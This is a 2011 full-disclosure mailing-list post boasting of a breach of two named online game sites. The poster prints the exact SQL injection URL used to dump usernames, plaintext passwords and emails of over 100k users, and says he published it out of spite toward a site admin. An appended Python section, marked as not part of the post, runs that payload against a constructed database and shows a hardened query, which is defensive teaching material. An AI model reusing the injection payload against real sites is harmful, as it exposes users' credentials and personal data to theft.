
List:       full-disclosure
Subject:    [Full-disclosure] bcwars.com & pokerrpg.com hacked 200k Email and
From:       Bob Smith <bobbyhadababyitsaboy () googlemail ! com>
Date:       2011-03-30 22:29:30
Message-ID: AANLkTimNqRyLom_AMbcszVeC50+0VQnxkV3SD=q1NJmY () mail ! gmail ! com

Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

bcwars

pokerrpg

injection was
http://bcwars.com/forum/category/-3' union select
concat(id,'::::',username,':::::::',password,':::::::',email) from
tblUsers-- -

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
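
Added example, not part of the original post: the string-built category lookup that an injection like the one quoted above implies, next to a hardened version (allow-list plus bound parameter). Only `tblUsers` and its four column names come from the post; `tblCategories`, the function names, the sample rows and the use of SQLite with a stand-in `concat()` are assumptions.

```python
import re
import sqlite3

# The injection string exactly as quoted in the post (the URL path segment).
POSTED_SEGMENT = ("-3' union select concat(id,'::::',username,':::::::',"
                  "password,':::::::',email) from tblUsers-- -")

def make_db():
    """Constructed sample data. Only tblUsers and its four columns come from
    the post; tblCategories and every value below are assumptions."""
    db = sqlite3.connect(":memory:")
    # Stand-in for MySQL's CONCAT() so the quoted string runs under SQLite.
    db.create_function("concat", -1, lambda *a: "".join(str(x) for x in a))
    db.executescript("""
        CREATE TABLE tblCategories (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE tblUsers (id INTEGER PRIMARY KEY, username TEXT,
                               password TEXT, email TEXT);
        INSERT INTO tblCategories VALUES (1, 'General'), (2, 'Trading');
        INSERT INTO tblUsers VALUES
            (1, 'alice', 'constructed-pw', 'alice@example.invalid');
    """)
    return db

def titles_vulnerable(db, segment):
    # 'Before': the path segment is pasted into the SQL text, so a quote in
    # it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM tblCategories WHERE id = '" + segment + "'"
    return [row[0] for row in db.execute(sql)]

def titles_hardened(db, segment):
    # 1) Allow-list: a category id is 1-9 ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", segment):
        return []
    # 2) Bound parameter: the value never becomes part of the SQL text.
    cur = db.execute("SELECT title FROM tblCategories WHERE id = ?",
                     (int(segment),))
    return [row[0] for row in cur]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", titles_vulnerable(db, POSTED_SEGMENT))
    print("hardened:  ", titles_hardened(db, POSTED_SEGMENT))
    print("hardened 1:", titles_hardened(db, "1"))
```

The plaintext passwords the post mentions are a separate problem: a bound query stops this read, but stored passwords still need a salted, slow hash.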